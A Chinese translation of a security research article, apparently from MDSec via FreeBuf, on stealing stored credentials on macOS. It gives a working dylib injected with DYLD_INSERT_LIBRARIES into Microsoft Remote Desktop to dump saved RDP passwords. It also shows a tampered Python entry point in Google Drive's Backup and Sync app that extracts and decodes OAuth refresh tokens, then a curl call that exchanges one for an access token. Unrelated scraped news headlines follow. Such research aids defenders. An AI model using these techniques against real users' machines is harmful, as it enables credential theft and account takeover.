拿起Mac来渗透：恢复凭证

介绍

获取凭证信息是红队的常用套路，因为这些凭证可横向移动的一把好手。网上很多用Windows进行凭据恢复的研究，随着渗透人员经济条件越来越好，各位师傅都换上了Mac(馋.jpg)

所以这篇文章中，我们将探讨如何通过代理应用程序进行代码注入来访问MacOS第三方应用程序中存储的凭据，包括Microsoft远程桌面和Google云端硬盘的案例研究。

Microsoft远程桌面

使用远程桌面应用程序时，注意它都具有一个保存RDP会话凭据的功能，如下所示：

这些会话的已存储凭据在应用程序中

发现这些凭据的第一步是探索应用程序的沙箱容器，使用命令grep -ir contoso.com查看Preferences / com.microsoft.rdc.mac.plistplist文件中包含的字符串。使用plutil -convert xml1 Preferences / com.microsoft.rdc.mac.plist将其转换为纯文本，我们看看：

在plist文件中，我们可以找到有关凭证的各种详细信息，但不幸的是，没有明文密码。如果这么简单，那就太好了。

下一步是在反汇编程序中打开“远程桌面”应用程序。

基于以上所述，我们知道已保存的条目在应用程序中被称为书签。

我们查下KeychainCredentialLoader::getPasswordForBookmark方法，我们可以看到，除其他外，它调用了一个名为getPassword的方法：

在getPassword内部，它尝试通过调用findPasswordItem方法来发现Keychain，该方法使用SecKeychainSearchCreateFromAttributes来找到相关的Keychain并最终复制出其内容：

基于所学知识，我们现在了解到RDP会话的密码存储在Keychain中。我们可以使用Keychain access应用程序对此进行确认：

但是，如果没有提权，我们无法访问已保存的密码。

找回密码

查看“访问控制”选项卡，我们可以看到Microsoft Remote Desktop.app被授予了对此项目的访问权限，并且不需要Keychain密码即可执行此操作：

回到我们最初的理论，如果我们可以注入到应用程序中，那么我们可以从Keychain中检索此密码。但是，在MacOS上进行代码注入并不是一件容易的事，并且当适当的安全控制措施到位（即SIP和适当的权利或启用了hardened runtime）时，Apple已经将其锁定了。这些选项可防止注入未经Apple签名或与应用程序相同的团队ID的库。

对我们来说幸运的是，使用codesign -dvvv –entitlements进行了验证：/Applications/Microsoft\ Remote\ Desktop.app/Contents/MacOS/Microsoft\ Remote\ Desktop我们发现没有这样的保护措施,意味着我们可以很好地使用-known DYLD_INSERT_LIBRARIES技术注入我们的动态库。

一个简单的dylib，用于根据发现的书签搜索“Keychain”项，如下所示：

#import "hijackLib.h" @implementation hijackLib :NSObject -(void)dumpKeychain { NSMutableDictionary *query = [NSMutableDictionary dictionaryWithObjectsAndKeys: (__bridge id)kCFBooleanTrue, (__bridge id)kSecReturnAttributes, (__bridge id)kCFBooleanTrue, (__bridge id)kSecReturnRef, (__bridge id)kCFBooleanTrue, (__bridge id)kSecReturnData, @"dc.contoso.com", (__bridge id)kSecAttrLabel, (__bridge id)kSecClassInternetPassword,(__bridge id)kSecClass, nil]; NSDictionary *keychainItem = nil; OSStatus status = SecItemCopyMatching((__bridge CFDictionaryRef)query, (void *)&keychainItem); if(status != noErr) { return; } NSData* passwordData = [keychainItem objectForKey:(id)kSecValueData]; NSString * password = [[NSString alloc] initWithData:passwordData encoding:NSUTF8StringEncoding]; NSLog(@"%@", password); } @end void runPOC(void) { [[hijackLib alloc] dumpKeychain]; } __attribute__((constructor)) static void customConstructor(int argc, const char **argv) { runPOC; exit(0); }

编译该库并通过DYLD_INSERT_LIBRARIES注入，我们可以查看存储在Keychain中的纯文本密码：

Google云端硬盘

前面的示例相对来说比较琐碎，因为远程桌面应用程序未包含任何运行时保护措施以防止未经授权的代码注入。让我们看另一个例子。

如果我们查看Google云端硬盘应用程序的元数据和权利，我们可以看到该应用程序使用了hardened runtime：

$ codesign -dvvv --entitlements :- '/Applications//Backup and Sync.app/Contents/MacOS/Backup and Sync' Executable=/Applications/Backup and Sync.app/Contents/MacOS/Backup and Sync Identifier=com.google.GoogleDrive Format=app bundle with Mach-O thin (x86_64) CodeDirectory v=20500 size=546 flags=0x10000(runtime) hashes=8+5 location=embedded

Apple介绍：

hardened runtime与系统完整性保护（SIP）一起，通过防止某些类型的利用，例如代码注入，动态链接库（DLL）劫持和进程内存空间篡改，来保护软件的运行时完整性。

我的同事（之前过，当这些保护措施不到位时，如何实现向代理应用程序的代码注入，但是在这种情况下，hardened runtime意味着如果我们尝试使用亚当描述的先前的DYLD_INSERT_LIBRARIES或Plugins技术，将失败，我们将无法再使用加载程序将其注入该进程。但是有替代路线吗？

仔细研究Google云端硬盘应用，我们会在该应用的Info.plist中发现以下内容：

PyRuntimeLocations @executable_path/../Frameworks/Python.framework/Versions/2.7/Python

我们还注意到/ Applications / Backup和Sync.app/Contents/MacOS文件夹中的其他Python二进制文件：

-rwxr-xr-x@ 1 dmc staff 49696 23 Dec 04:00 Backup and Sync -rwxr-xr-x@ 1 dmc staff 27808 23 Dec 04:00 python

因此，这里发生的是Google Drive的“备份和同步”应用程序实际上是基于python的应用程序，可能使用py2app或类似程序进行了编译。

让我们看看这是否为我们提供了执行代码注入的机会。

分析

查看该应用程序，我们发现唯一的python源文件是./Resources/main.py，它执行以下操作：

from osx import run_googledrive if __name__ == "__main__": run_googledrive.Main

不幸的是，我们不能修改该文件，因为它位于受SIP保护的目录中。但是，我们只需将整个应用程序复制到一个可写的文件夹中，它将保持相同的权利和代码签名；我们将其复制到/tmp。

使用/tmp文件夹中的应用程序副本，我们编辑main.py来试试是否可以修改：

if __name__ == "__main__": print('hello hackers') run_googledrive.Main

运行该应用程序，我们可以看到我们已经执行了Python：

/t/B/C/Resources $ /tmp/Backup\ and\ Sync.app/Contents/MacOS/Backup\ and\ Sync /tmp/Backup and Sync.app/Contents/Resources/lib/python2.7/site-packages.zip/wx/_core.py:16633: UserWarning: wxPython/wxWidgets release number mismatch hello hackers 2020-02-21 09:11:36.481 Backup and Sync[89239:2189260] GsyncAppDeletegate.py : Finder debug level logs : False 2020-02-21 09:11:36.652 Backup and Sync[89239:2189260] Main bundle path during launch: /tmp/Backup and Sync.app

既然我们知道可以在代码签名无效的情况下执行任意python，是否可以以某种方式滥用它？

滥用 Surrogate

通过查看Keychain，我们发现该应用程序已存储了多个项目，包括以下标记为“应用程序密码”的项目。设置访问控制，以便Google云端硬盘应用无需身份验证即可恢复该访问控制：

让我们看看如何使用替代应用程序来恢复它。

回顾该应用程序如何加载其Python软件包，我们在./Resources/lib/python2.7/site-packages.zip中发现了捆绑的site-packages资源，如果我们对此进行解压缩，则可以了解发生了什么。

对“ keychain”执行初始搜索会发现几个包含字符串的模块，包括osx / storage / keychain.pyo和osx / storage / system_storage.pyo；我们感兴趣的一个是system_storage.pyo，keychain.pyo，这是keychain_ext.so共享库的Python接口，它提供了本地访问以访问Keychain。

反编译并查看system_storage.pyo，我们发现以下内容：

from osx.storage import keychain LOGGER = logging.getLogger('secure_storage') class SystemStorage(object): def __init__(self, system_storage_access=None): pass def StoreValue(self, category, key, value): keychain.StoreValue(self._GetName(category, key), value) def GetValue(self, category, key): return keychain.GetValue(self._GetName(category, key)) def RemoveValue(self, category, key): keychain.RemoveValue(self._GetName(category, key)) def _GetName(self, category, key): if category: return '%s - %s' % (key, category) return key

考虑到这一点，让我们修改main.py以尝试从Keychain中检索凭证：

from osx import run_googledrive from osx.storage import keychain if __name__ == "__main__": print('[*] Poking your apps') key = “xxxxxxxxx@gmail.com" value = '%s' % (key) print(keychain.GetValue(value)) #run_googledrive.Main

这次，当我们运行该应用程序时，我们获得了一些似乎是base64编码的数据：

让我们更深入地了解这是什么以及我们是否可以使用它。

搜索在secure_storage.SecureStorage类是用于我们找到了TokenStorage类，包括方法：

def FindToken(self, account_name, category=Categories.DEFAULT): return self.GetValue(category.value, account_name)

所述TokenStorage类则内使用公共/ AUTH / oauth_utils.pyo在模块LoadOAuthToken方法：

def LoadOAuthToken(user_email, token_storage_instance, http_client): if user_email is None: return else: try: token_blob = token_storage_instance.FindToken(user_email) if token_blob is not None: return oauth2_token.GoogleDriveOAuth2Token.FromBlob(http_client, token_blob)

看一下oauth2_toke.GoogleDriveOAuth2Token.FromBlob方法，我们可以看到发生了什么：

@staticmethod def FromBlob(http_client, blob): if not blob.startswith(GoogleDriveOAuth2Token._BLOB_PREFIX): raise OAuth2BlobParseError('Wrong prefix for blob %s' % blob) parts = blob[len(GoogleDriveOAuth2Token._BLOB_PREFIX):].split('|') if len(parts) != 4: raise OAuth2BlobParseError('Wrong parts count blob %s' % blob) refresh_token, client_id, client_secret, scope_blob = (base64.b64decode(s) for s in parts)

我们从Keychain中恢复的Blob令牌，client_id和client_secret等的base64副本。我们可以使用以下方法恢复它们：

import base64 _BLOB_PREFIX = '2G' blob = ‘2GXXXXXXXXXXXXX|YYYYYYYYYYYYYY|ZZZZZZZZZZZ|AAAAAAAAAA=' parts = blob[len(_BLOB_PREFIX):].split('|') refresh_token, client_id, client_secret, scope_blob = (base64.b64decode(s) for s in parts) print(refresh_token) print(client_id) print(client_secret)

然后，刷新令牌可用于请求新的访问令牌，以提供用户身份访问Google帐户：

$ curl https://www.googleapis.com/oauth2/v4/token \ -d client_id=11111111111.apps.googleusercontent.com \ -d client_secret=XXXXXXXXXXXXX \ -d refresh_token=‘1/YYYYYYYYYYYYY' \ -d grant_type=refresh_token { "access_token": “xxxxx.aaaaa.bbbbb.ccccc", "expires_in": 3599, "scope": "https://www.googleapis.com/auth/googletalk https://www.googleapis.com/auth/drive https://www.googleapis.com/auth/peopleapi.readonly https://www.googleapis.com/auth/contactstore.readonly", "token_type": "Bearer" } 结论

在这项研究中，介绍如何通过滥用代码注入替代应用程序来从MacOS设备的Keychain中恢复凭证而无需提升权限。尽管Apple提供了一些保护措施来限制代码注入，但是当利用已经具有访问存储资源所需权限的代理应用程序时，这些保护措施并不总是完全有效的。

*参考来源：mdsec，FB小编周大涛编译，转载请注明来自FreeBuf.COM

责任编辑：

查看全文
如若内容造成侵权/违法违规/事实不符，请联系编程学习网邮箱：809451989@qq.com进行投诉反馈，一经查实，立即删除！

欲知巴蜀，先观此书
原标题：欲知巴蜀，先观此书去岁岁末，四川青年作家林君赶秋寄来新著《古书中的成都》。此书乃2019 年11 月由成都时代出版社出版，挖掘成都之人文历史，殊有特色，于近日书林之列，不可泯没焉，故特为申说之，以备有心之君子留意购览。巴蜀文明，在我国特居一端，早先即有三星…...
2024/5/7 17:30:13
刘作虎剧透：今年一加会有非常受女性喜爱的新配色
原标题：刘作虎剧透：今年一加会有非常受女性喜爱的新配色最近频繁有消息对一加8系列进行爆料，而最新的消息显示，一加8系列或提前至4月份亮相。虽然一加没有对这些发布爆料进行回应，不过从目前得到的消息来看，一加8系列的研发进程还是比较顺利的。今天，一加科技CEO刘作…...
2024/5/7 18:08:39
真香！苹果发布史上最强iPhone 11 Pro
原标题：真香！苹果发布史上最强iPhone 11 Pro苹果今天的发布会，一口气发布了三款新iPhone：iPhone 11、iPhone 11 Pro、iPhone 11 Pro Max。这是苹果第一次用Pro来命名iPhone。 iPhone 11相当于去年的iPhone XR，入门款。 iPhone 11 Pro和Pro Max就是去年XS和XS MAX的区别，…...
2024/4/25 16:46:36
县分经理必须懂的“三件事”
原标题：县分经理必须懂的“三件事”2019年已进入下半场，总结回顾上半年工作的过程中，资治通信在各种场合与许多县区分公司的经理们交流中，经常能听到这样的反馈：政企经理每天“忙碌”就是拿不到大单！政企集团的大单丢失也弄不清楚啥原因！政企市场今年KPI任务完成压…...
2024/4/25 16:46:35
三大运营商已开通5G基站15.6万个/ 中国企业和消费者对5G兴趣浓厚领先美国
原标题：三大运营商已开通5G基站15.6万个/ 中国企业和消费者对5G兴趣浓厚领先美国▋GSMA：中国企业和消费者对5G兴趣浓厚领先美国5年北京时间3月5日晚间消息，据国外媒体报道，全球移动通信系统协会（GSMA）当日发布报告称，中国企业和个人消费者对5G和智能设备的兴趣浓厚，…...
2024/4/25 16:46:33
阿里巴巴保持的这项世界纪录，可能要被打破了！
原标题：阿里巴巴保持的这项世界纪录，可能要被打破了！图片来源：摄图网（图文无关）作为全球最赚钱的企业，沙特阿美的上市计划一直备受关注。沙特阿美（Saudi Aramco）在11月17日表示，公司IPO指导价为每股30里亚尔至32里亚尔，基础发行规模为30亿股，约占公司总股本的1…...
2024/4/25 16:46:32
危言耸听，三大运营商遭遇的史上最差开局？真相是什么？
原标题：危言耸听，三大运营商遭遇的史上最差开局？真相是什么？作者：海hai人生读完需要 5 分钟速读仅需 4 分钟据C114消息：今年三大运营商的开年运营数据增长创下了进入4G时代以来的最差记录。2月20日，中国移动率先公布运营数据，移动客户和4G客户出现负增长；中…...
2024/5/6 4:28:36
英飞凌与高通联袂打造面向3D认证的高质量标准解决方案
原标题：英飞凌与高通联袂打造面向3D认证的高质量标准解决方案责任编辑：...
2024/4/25 16:46:31
“新基建”专家谈丨王春晖：构建新型基础设施是繁荣数字经济的基石
原标题：“新基建”专家谈丨王春晖：构建新型基础设施是繁荣数字经济的基石进入2020年，我国遭遇了新中国成立以来传播速度最快、感染范围最广、防控难度最大的一次重大突发公共卫生事件。疫情暴发以来，习近平总书记亲自指挥、亲自部署疫情防控工作，多次主次召开中央政治局会…...
2024/4/25 16:46:29
行业专家建议制定解决统一通信的策略
原标题：行业专家建议制定解决统一通信的策略蓝色字体”，选择 “设为星标” 关键讯息，D1时间送达！随着技术不断发展，组织采用统一通信策略的方式也在不断变化。组织需要制定一种策略来解决有关统一通信(UC)安全性、会话发起协议(SIP)中继和VoIP合规性的问题。采用统一…...
2024/4/25 16:46:28
少了文学，哪儿来的治愈系？
原标题：少了文学，哪儿来的治愈系？人们总是对文学不屑一顾，要么对文学边缘化地冷眼旁观，要么就是对文艺青年这个词儿避之唯恐不及，好像和文学有关的人大抵都是不接地气的精神贵族，多一个少一个，于这个世界都无伤大雅。于是文学家倒不如音乐家更受人瞩目，歌写得好唱得…...
2024/4/25 16:46:29
申请分享 | 文书助攻进世界前20名校—留学生分享第52期
原标题：申请分享 | 文书助攻进世界前20名校—留学生分享第52期学生背景介绍 Z师姐申请背景：北京师范大学-香港浸会大学联合国际学院（UIC），应用经济学；GPA 3.1，IELTS 6.5，无G；证券公司、银行、四大实习录取学校与项目：爱丁堡大学：MSc Economics（Finance） …...
2024/4/25 16:46:27
真相！两名高考状元的求学路，南山艺校指明灯！
原标题：真相！两名高考状元的求学路，南山艺校指明灯！近日，2019年江西省普通高考艺术类统考戏剧影视文学（广播电视编导）成绩公布，一名17岁来自赣州的小男孩陈友辉以得分163.5分的好成绩夺得第一名，成为江西省广播电视编导统考状元，无独有偶，更令人惊奇的是，2011年的江…...
2024/5/5 15:27:51
黄长烨:跟随金正日是对历史和人民的犯罪
原标题：黄长烨:跟随金正日是对历史和人民的犯罪黄长烨原是朝鲜最高人民会议议长，朝鲜劳动党总书记与金日成综合大学校长。朝鲜至今变节到韩国的最高级别官员。1997年2月时在北京走进韩国大使馆要求政治庇护，后来逃亡到韩国，主张推翻金正日政权。由于他的变节，妻子和长女自…...
2024/4/25 16:46:24
回眸奥运史上的中国“惊艳”
原标题：回眸奥运史上的中国“惊艳”陈玉忠里约奥运，如火如荼，中国健儿在赛场上奋勇拼搏，五星红旗一次次升起。中国走上奥运辉煌之路与改革开放这一伟大历史进程的交汇并非偶然：改革开放的经济社会发展为体育振兴奠定基础，而体育在改革开放进程中也发挥着不可替代的价值…...
2024/5/5 5:27:13
从冷战堡垒到民主灯塔:美国对台政策演变
原标题：从冷战堡垒到民主灯塔:美国对台政策演变资料图：美国对台军售清单上的F16CD战机。冷战期间的美国对台政策 1945年8月日本宣布投降，中国政府即根据1943年12月中美英签署的《开罗宣言》和1945年以中美英三国首脑名义发表的《促令日本投降的波茨坦公告》，于9月4日宣…...
2024/5/5 12:01:19
原创2020中国农业难：沙漠蝗阴云未消，草地贪夜蛾已率先入侵我国西南
原标题：2020中国农业难：沙漠蝗阴云未消，草地贪夜蛾已率先入侵我国西南一、起源于北美：沙漠蝗阴云未散，草地贪夜蛾已率先入侵我国西南！ 2月中旬，农业农村部种植业管理司表示，近年来，我国蝗虫监测预警和防治能力不断提升，防治技术方面具有世界领先水平，防蝗药械储备充…...
2024/5/5 9:46:31
女人成功靠什么?（建议所有女人都看一看!）
原标题：女人成功靠什么?（建议所有女人都看一看!）1：女人活着要有自己的目标只要你不想做那无根的浮萍，任凭雨打风吹去，你就得有自己的目标。它可以大可以小，可以崇高也可以平凡，不管你的目标是什么，但就是不能没有。 2：可以不做“强人”，但一定要做强者对于女人…...
2024/4/25 16:46:20
高热饮食以下三类人要少用
原标题：高热饮食以下三类人要少用清晨当小编匆匆拎着早点走进办公室，同事一脸惊讶：你居然又吃炸油条？这周6天了吧！其实小编也知道这样的早餐不一定推荐。这背后的知识是这样的。 1、不宜经常吃油条大家知道，油条属于高温油炸食品，油温达1900C，并且油是反复使用的…...
2024/4/14 3:08:02
南京选谦学堂端午亲子活动——重温经典，制作粽子
原标题：南京选谦学堂端午亲子活动——重温经典，制作粽子我们庆祝端午节是为了尊敬圣人，而尊敬圣人最好的方法是大家去读圣人的书。所以，端午节，纪念屈原最好的方式就是重温《离骚》。当年苏东坡因反对王安石新法，被贬到海南岛，孤苦不堪．有一次过年，思乡情切，想到屈原…...
2024/5/5 11:21:04

拿起Mac来渗透：恢复凭证

相关文章

最新文章